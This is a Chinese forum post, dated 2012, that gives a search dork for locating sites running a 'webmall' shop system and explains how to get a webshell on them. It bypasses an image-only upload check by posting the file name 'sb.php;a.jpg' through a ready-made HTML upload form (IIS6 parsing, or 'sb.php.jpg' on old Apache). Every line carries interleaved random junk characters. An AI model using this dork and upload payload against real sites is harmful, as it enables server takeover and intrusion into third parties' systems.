关键字:inurl:webmall/detail.php?id# e" o4 `: @1 u5 M# v# G/ f8 z
+ g, E* J) G4 g( d; H5 Y数据表:pwn_base_admin
5 G5 Y7 n' R/ Z3 K) s, a$ n/ D0 o2 u m. i" e, C" w2 J
关于拿shell; B7 o) B& v0 |! l+ v
7 B1 k6 v* f! ~, V; `首先登录后台admin.php" r) U0 ?: k& I- Z4 G$ R
& z, H: G; k: \( d7 U B
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
- E1 q1 n0 {3 j. V% Q9 b换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
' x; A; Z' |) I$ g3 D然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的0 A8 F/ i4 ^. j4 f+ [) u6 G
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
2 Q2 K& n+ @" S/ b4 N<input type="text" name="fileName" value="sb.php;a.jpg" /> 0 W" k1 b$ b( d9 d' Z4 f; ~
<input type="hidden" name="attachPath" value="news/pics/" />
7 k. r9 ]7 K0 }4 z' w5 R8 q; C<input type="file" name="fileData" size="14" /></td> # R; K* Z+ ]* y! A" I* p/ t2 w
<input type="submit" name="button" value="确定" />
0 m' U% O# ^" {/ I</form>
( G, G, l) I; h6 F* L7 d8 M* J9 ^
- S# N( a9 q" o, Z4 |1 Z3 N首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。% u: S& U: F) Y3 Z) @
7 i& w( d9 }9 u9 j+ ] |
发表于 2012-11-9 20:52:15
收藏
支持
反对